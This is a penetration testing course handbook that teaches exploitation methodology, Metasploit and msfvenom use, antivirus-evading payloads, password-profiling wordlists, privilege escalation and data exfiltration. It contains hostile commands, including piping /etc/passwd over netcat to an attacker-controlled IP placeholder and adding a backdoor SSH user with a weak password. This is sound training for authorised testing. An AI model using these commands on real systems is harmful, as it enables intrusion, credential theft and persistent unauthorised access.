technical foundations linux & networking...differences when exploiting different targets (such...
TRANSCRIPT
Penetration Testing - Course Handbook
Technical Foundations Linux & Networking
Baruch Garcia-Gallo
1 | WYWM Penetration Testing Module Handbook
Table of Contents
Pentest .............................................................................................................................................. 2
Methodology ................................................................................................................................. 2
Exploitation ................................................................................................................................... 2
What you need to know about exploitation ............................................................................... 3
Metasploit ................................................................................................................................. 4
Finding Published Exploits .......................................................................................................... 8
Available and Custom Created Wordlists for Brute-forcing ......................................................... 9
Wordlists Available on Kali ......................................................................................................... 9
Generating Custom Wordlists .................................................................................................. 10
Netcat...................................................................................................................................... 12
Post Exploitation.......................................................................................................................... 12
Privilege Escalation .................................................................................................................. 12
Data Exfiltration ....................................................................................................................... 14
Clean-up .................................................................................................................................. 15
2 | WYWM Penetration Testing Module Handbook
Pentest A Penetration Test is the process of compromising/exploiting a target machine to gain root/admin
privileges and download/exfiltrate company data. A penetration test (pentest) is conducted after
vulnerability discovery has been conducted during a VA.
You will be required to follow the pentest by developing a detailed report, which will be of high
value to the company hiring your services.
The report will outline the following:
• Exploitation method
• Data exfiltrated
• Affected systems
• How the client may remediate the issues found
Methodology Reading the RoE/scope and conduction a vulnerability assessment (excluding report writing) are
both to be completed before continuing with the penetration test.
Pentest Methodology
1. Exploitation Compromise target system
2. Privilege Escalation Gain root/admin access
3. Data Exfiltration Extract private information
4. Clean-Up Remove any uploaded files including backdoors etc
5. Report Writing It’s all about suppling this end product
Exploitation You can Exploit a system not only through published vulnerabilities but also due to service
misconfigurations. For example, an ftp service might have anonymous user login enabled and allow
file uploads using anonymous login. This is not a vulnerability as it is just how the service normally
runs. However, it is a poorly designed component of the service – a misconfiguration of the service
that could allow an attacker to gain a foothold onto the target. So, although we need to focus on
vulnerability research we also need to look at how each service is configured when attempting to
exploit a target.
3 | WYWM Penetration Testing Module Handbook
What you need to know about exploitation The goal of exploiting a system (And ultimately a penetration test) is to gain access to a target system
and be able to exfiltrate sensitive data from the client’s network. By exfiltrating business critical
sensitive data, you clearly show a company how their security posture is lacking and provide a means
to improve their security.
How to exploit a system
To exploit a system, you need to have a way of directly interacting with the target. In computing a
shell is an interface in which you can interact with a machine. The command line interface in kali is a
shell (BASH stands for born again shell). When you hear pentester’s speaking about getting shells
what they mean is that they want to have a direct interface whereby they can interact with the target.
Obviously, it is important to gain a direct interface with a target as it provides a possible means to
read, write, delete and copy data on the target system.
Now that you know what a shell is and that you want to get a shell (have access to an interface
whereby you can interact with the target), you may be asking “how do I get a shell?”. To get a shell
you need to put what’s called a “payload” onto the target system.
A payload is a file containing code that runs given commands once on the target system. These
commands might be to create a shell (an interface) that can be sent back to us. From here we can
interact with the target system through the shell – much like we have like we have interacted with
our local Kali machine through the command line interface.
4 | WYWM Penetration Testing Module Handbook
There are different types of shells that behave in different ways – bind shells and reverse shells.
Reverse shells – are interfaces that are sent back to our machine. All we have to do is “catch” this
incoming connection (with netcat or Metasploit’s Multihandler)
Bind shells – are interfaces that connect to outward facing ports on the target machine. We must
then connect to the given port on the target manually from our machine to access the shell
(interface).
• Note that getting a shell on the target system is not the only means of data exfiltration but it
is the most versatile and complete way of having the ability to access all data on the target.
That is why getting a remote shell is highly sort after when conducting a penetration test.
Getting a Payload on the Target
The first stage of getting a shell is to get a payload on the target system. There are many ways to get
a payload on the target machine or network. These can include sending phishing emails, watering hole
attacks, USB drops or even using discovered vulnerabilities or misconfigurations in software or
services to upload the payload directly to the target. Finding a way to get a payload onto the target
device or network is the part of the penetration testing process that takes the largest amount of
knowledge, skills and creativity.
Metasploit Metasploit is a framework used to automate the exploitation of a target. Metasploit has a large range
of exploitation modules that automatically run exploits against known vulnerabilities on a selected
target – you only need to set a few options to be able to run one of these exploit modules. Metasploit
also contains auxiliary modules which can assist in the enumeration of a target. The rapid 7 and
offensive security web sites have information regarding Metasploit modules to use for the exploitation
of specific vulnerabilities. It is still important for you to understand the inner workings of an exploit
when running Metasploit exploit modules, as fully understanding how they work means that when
unexpected errors occur you can troubleshoot them successfully.
To start Metasploit you must first start the postgresql service to enable quicker searching when using
Metasploit.
5 | WYWM Penetration Testing Module Handbook
To set-up Metasploit type the following command: service postgresql start
to start Metasploit use the command: msfconsole
From here Metasploit opens and you can begin by searching for modules to use. You can search for
modules using the search command alongside a service/software name that you are using. Metasploit
has multiple module types available. The main modules you will be using during a penetration test
and even a vulnerability assessment are:
• Auxiliary Modules – These modules assist in service enumeration and discovering software
misconfigurations
• Post Exploitation Modules – These modules are to be used once access to a system has been
gained but you do not have full privileges on the system. These modules assist in privilege
escalation.
• Exploit Modules – These modules assist in the exploitation of a known vulnerability.
Example searching for modules related to specific software type: search proftpd
From here you will have a list of proftpd modules within the Metasploit framework.
You can get information about each module by using the info command.
Example of info command: info exploit/unix/ftp/proftpd_133c_backdoor
6 | WYWM Penetration Testing Module Handbook
Once you have decided on which module you wish to choose you need to select it. To select an exploit
module you call the use command: use exploit/unix/ftp/proftpd_133c_backdoor
Once you have loaded a module you can then see all options that are available to be set in the loaded
module.
In the basic options section you can see which options are required for the module to work properly
– these will be marked as yes under required.
In some exploit modules you can change the payload and targets. As some modules may have options
differences when exploiting different targets (such as a Windows or Linux target).
To change the target use the command:
show targets
As you can see with the proftpd backdoor exploit the target is set automatically with an id of 0. In this
instance, you can only select one operating system or software option to set as the designated target.
7 | WYWM Penetration Testing Module Handbook
Below you will see an example of show target for the recent eternal blue exploit – in this instance you
can see this exploit will only be effective against windows server 2008 R2 x64 or Windows 7 machines.
Metasploit command Examples Description
set Set payload
Set rhost
Set lport
Sets individual exploit options
show Show options
Show targets
Show payloads
Provides a list of options,
targets or payloads for a specific
module
use Use <module name> Select a module to use
search Search <service/software name> Search for modules related to
specific software or service
use exploit/multi/handler A handler to catch a payload as it connects back to
your local machine. (much like netcat)
Catch a connection coming back
to the local host from a payload
Creating your own payload
Although Kali has many inbuilt webshells that you can use as required (in the /usr/share/webshells/
directory).
8 | WYWM Penetration Testing Module Handbook
You can also use msfvenom to create payloads that given certain vulnerabilities or misconfigurations
are present may mean that you can upload these payloads directly onto the target. Msfvenom works
by generating shellcode for you. Another tool for shell code generation is Veil-Ordnance, part of the
veil framework.
Msfvenom can also encode your payloads to hide them from antivirus however as most AV solutions
pick up msfvenom payloads because they use a base template which can be easily detected. Other
encoders include Ps1encode for powershell based payloads and Veil-evasion as part of the veil
framework. Veil generates shellcode that can bypass most anti-virus solutions.
Msfvenom is already preinstalled on kali (see msfvenom cheat sheet for usage), however you can
install Veil easily by using the command:
git clone https://github.com/Veil-Framework/Veil
As you can see above Veil-ordnance and Veil-evasion are in the Veil Tools directory, ready for use.
Finding Published Exploits When using exploits, you should use exploits that come from a reliable source such as exploit-db or
you should be able to look at the exploit code and understand how the exploit works. This is because
some exploits may harbor malicious code which you obviously do not want to introduce into a client’s
network.
Exploits archived on Offensive Security’s Exploit Database are peer reviewed and reliable and
therefore can be used during a penetration test.
Exploit-db – https://www.exploit-db.com/
Shodan exploits - https://exploits.shodan.io/welcome
Packetstorm - https://packetstormsecurity.com/files/tags/exploit/
9 | WYWM Penetration Testing Module Handbook
However, sometimes these exploits are only usable for a specific target type (such as windows server
2010 and earlier) even though later windows server versions may be vulnerable to the specific
vulnerability that the exploit targets. In this instance to exploit a vulnerable windows server 2016
machine you would have to edit the exploit. This is true for the eternal blue vulnerability which effects
windows machines running SMBv1.
Available and Custom Created Wordlists for Brute-forcing When brute-forcing usernames, passwords or directories you can use wordlists. Many wordlists are
available in Kali, available for download online and you can also create your own custom wordlists
using tools in Kali.
Wordlists Available on Kali Below is a table of wordlists available in Kali and where to find them.
Wordlist Type Wordlist File Names Use of Wordlist
Password List Rockyou.txt
Adobe_top100_pass.txt
Idrac_default_pass.txt
Hci_oracle_passwords.txt
http_default_pass.txt
default_pass_for_services_unhash.txt
db2_default_pass.txt
ipmp_passwords.txt
mirai_passwords.txt
multi_vendor_cctv_dvr_pass.txt
snmp_default_pass.txt
vnc_passwords.txt
tomcat_mgr_default_pass.txt
postgres_default_pass.txt
passwords.lst
oracle_default_passwords.csv
Unix_passwords.txt
/usr/share/worlists/
/usr/share/wordlists/metasploitq
Directory Lists Small.txt
big.txt, best1050.txt
best110.txt
best15.txt
/usr/share/wordlists/dirb/others
First Names Names.txt /usr/share/wordlists/dirb/others
10 | WYWM Penetration Testing Module Handbook
Webserver
specific
Directories and
Files list
Apache.txt,
coldfusion.txt,
axis.txt,
cgis.txt,
domino.txt,
fatwire_pagenames.txt,
fatwire.txt,
frontpage.txt,
hpsmh.txt,
hyperion.txt,
iis.txt,
iplanet.txt,
jboss.txt,
jersey.txt,
jrun.txt,
netware.txt,
oracle.txt,
ror.txt,
sap.txt,
sharepoint.txt,
sunas.txt,
test.txt,
tomcat.txt,
vignette.txt,
weblogic.txt,
websphere.txt
/usr/share/worlists/dirb/vulns
Linux Sensitive
Files
Sensitive_files.txt /usr/share/wordlists/metasploit
Generating Custom Wordlists To have a higher chance of success during brute force attacks you can create your own custom
password lists. Many people create passwords that relate personally to them so that they have a
higher chance of remembering their password. In this way you can generate custom password lists
based on a person’s birthdays, pets, family, likes, dislikes and so on.
CeWL
CeWL stands for custom wordlist generator and as the name suggests generates custom wordlists.
CeWL crawls a given webpage and makes a wordlist based on specified parameters. You can specify
any webpage including a target individual’s social media accounts or webpages of interest to the
individual. As an example, imagine you are on a pentest and you know the network administrator is
obsessed with ‘The Beatles’. Thinking that he has incorporated this into his password you could use
the following CeWL command:
11 | WYWM Penetration Testing Module Handbook
cewl https://en.wikipedia.org/wiki/The_Beatles -d 1 -m 5 -w beatlesPassList.txt
In this CeWL is generating a wordlist called beatlesPassList.txt by crawling all words on the Beatles
Wikipedia webpage. It is only including words in the wordlist that are longer than 5 characters and is
only staying on the Wikipedia page – not crawling links from the webpage.
-d The depth CeWL will crawl in regards to links on a webpage
-m Limits to only including words with characters equal to or over the specified length
-w Outputs the wordlist into a specified file
CUPP
CUPP or common user password profiler creates a profile of the target person based on their
birthdate, pets, children, spouse and then uses this information to create a wordlist. Wordlists created
by CUPP can be used to brute force passwords for employee’s emails, ftp & ssh, web login portals and
internal system access. Below is a screenshot of the questions CUPP uses to profile an individual and
create a password list. CUPP also takes into consideration that some people may use numbers to
replace some letters within words within their password – as such CUPP wordlists contain password
variations based on this characteristic.
12 | WYWM Penetration Testing Module Handbook
Netcat Netcat is considered the hacking swiss army knife. Netcat allows you to connect to open ports, view
service versions from open ports, interact with services on open ports, listen on ports on your own
machine for incoming connections, listen with programs to allow a remote connection to interact with
a given program implemented on a designated port as well as send programs to other machines
through open ports. As you can see netcat is very versatile and is a good starting point when
interacting with a service running on an open port or receiving a connection instigated by a payload
uploaded onto a remote machine by yourself during exploitation of the target.
netcat Syntax netcat <flags> <ip address or domain name> <port number>
**note. An ip address is not required if you are just listening on the local host
netcat flags
-n stands for numerical ip rather than a domain
-v verbosity (add 2 v’s for double verbosity)
This option shows more information such as ip addresses and other connection information.
Verbosity is helpful when determining the ip address of a domain obscured by a WAF.
-l Listens on a port on your local machine with netcat.
Using the -l flag, you do not need to specify an ip address as you are listening on the local host.
-p Specify a target port
Post Exploitation Once a system has been exploited and some control has been gained we move to what’s known as
post exploitation which may include uploading files and tools to the target machine, privilege
escalation, data exfiltration and the clean-up of our presence on the system, etc.
Privilege Escalation Privilege escalation (PrivEsc) is just that, the act of elevating user privileges/permissions on the target
machine, so as to gain further control of the target machine and access to confidential data. You’ll
often gain access with normal user level permissions, with the aim to then elevate these to root user
permissions.
13 | WYWM Penetration Testing Module Handbook
There are numerous methods to conduct PrivEsc and they predominately fall into the following two
categories; privilege escalation exploits taking advantage of security misconfigurations. Again, the
exact methods are specific to the target environment.
In this course I’ll introduce the following PrivEsc methods, giving an example in the videos.
Kernel Exploits e.g. Dirty COW By taking advantage of kernel vulnerabilities an attacker can
potentially gain the ability to read, write, and execute arbitrary commands, with root user
permissions. Dirty COW is one such exploit and affects almost all versions of Linux since 2005. It allows
an adversary to gain high level write permissions to an otherwise read-only area of the target. And
although this exploit may cause system instability (so use with caution) I have shown it in the videos
as it’s considered one of the most important serious local Linux PrivEsc exploits.
Service Configurations Weak configurations are commonly used for PrivEsc as they are common and
have lower impact on the overall target system than kernel exploits. Listed below are some potential
methods of this.
Weak and Reused Passwords You can often PrivEsc by attempting to use weak or reused passwords
found during enumeration.
Suid/Services that Run as Root You can potentially get these services to run your commands as root.
These services may initially seem harmless however offer the ability to run scripts. E.g. Nmap, Bash,
Nano, Vim, cp.
Sudo If your current permissions on the target machine allow you to run a program using sudo then
you can potentially run commands on the target system. As discussed earlier this can be done by
typing either sudo or su before the command.
PrivEsc Tools
The above list is only an insight into possible PrivEsc methods. So with many potential methods a great
place to start, especially if you limited for time, is with automated tools. Below I’ll list a few tools for
elevating your privileges on both Linux and Windows target machines.
LinEnum Is a script that runs a range of PrivEsc checks including: Kernel details, system info,
user info, password polocies, checks for stored password hashes, privilege access, permissionis, if
current user has sudo access, lists cron jobs, checks for default and/or weak credentials, locates SUID
files and worl-writable files, NFS details, and searches log files, plus more.
LinEnum is located at https://github/rebootuser/LinEnum
e.g. Syntax: ./LinEnum.sh -k <keyword> -r <report name> -e <export location /tmp/> -t
-t = a thorough scan. Otherwise the default scan is a quick scan.
14 | WYWM Penetration Testing Module Handbook
Unix-privesc-check is a script that searches for security misconfigurations which may allow and
normal user to escalate privileges. It can be used on different target machine operating systems
including Linux, Unix, and Solaris.
Unix-privesc-check located at: https://github/pentestmonkey/unix-privesc-check
Syntax: unix-privesc-check <standard or detailed>
Windows-privesc-check Offers similar functionality on Windows target systems as unix-
privesc-check does on Linux targets.
Windows-privesc-check located at: https://github.com/pentestmonkey/windows-privesc-check/
PowerSploit (PowerShell Post Exploitation Framework) Is a collection of PowerShell modules
useful during all stages of a pentest on a Windows target machine. These modules range from
reconnaissance, PrivEsc, code execution, to data exfiltration.
PowerSploit can be located at: https://github.com/PowerShellMafia/PowerSploit/
I recommend checking out the above link for more information on PowerSploit and its operation.
Data Exfiltration Data exfiltration is essentially the act of downloading data/files from the target machine. In our case,
as a pentester, this data is used as evidence to support our findings. Data can be exfiltrated using
numerous methods dependent on the target environment, some of these are listed below.
Shells certain shells such as Meterpreter (shown in video and cheat sheet) which you can simply use
standard commands to navigate through the target system. If the target system is a Windows OS you
can use PowerShell or PowerSploit (as outlined above)
Payloads Metasploit contains a range of payloads capable of exfiltrating data, e.g. backdoors
can be used to both upload and download data from the target machine.
Netcat netcat can be easily used to transfer data between the target and your machine, you can do
this with the following command.
Your machine: dir you want to save file/# nc -l -p 4444 > <filename>
Target machine: /etc/# cat passwd | nc <your IP> passwd
15 | WYWM Penetration Testing Module Handbook
SSH If SSH daemon is up you can create a new user and SSH into the target machine.
Check SSH is up: netstat -tulpn | grep sshd
Create new user on target machine: /usr/bin/useradd <username>
Create new users pwd on target machine: /usr/bin/passwd <username>
Set the password to something easy e.g. abc123
Add new user to SSH config file: echo>> /etc/ssh/sshd_config AllowUsers <username>
Now on your machine type: ssh <username>@<target IP> password<password you set>
FTP File Transfer Protocol can often be used to transfer files from the target machine, you may
even find anonymous FTP logins.
Hosting the files on the target machines web server
NFS Share NFS or Network File System protocol can be considered as shared file storage on the
target machine. And through the process of mounting you can potentially gain access to certain
directories such as the tmp directory.
E.g. mount <target IP>:/ /tmp/
If successful you can go to /tmp/share to view its contents.
CrackMapExec one of CrackMapExec’s functions is to gather clear-text windows credentials from a
target windows machine. It is located at https://github.com/byt3bl33d3r/CrackMapExec
I recommend going to the above link to read the documentation and instructions.
Clean-up As you could imagine leaving shells waiting for a real adversary, after the pentest is complete, is not a
good idea and as such cleaning up the target system should always be on your mind and not just an
after though. So along with the records you should already be keeping simply add notes on what
alterations were made to the system and where they were made. These recorded alterations should
include everything from users created, logs altered, payloads uploaded and more. These notes need
to be meticulous in order to prevent you missing something and compromising the target systems
security.
These notes aren’t just for your records, they will also provide administrators a list of actions to
necessary in the event that you are unable to remove a file or time constraints don’t allow you to clean
the target.
When cleaning up simply use the rm command to remove all items on your list, then undo any actions
you performed to the system. And when complete let the sys admins know what has been completed.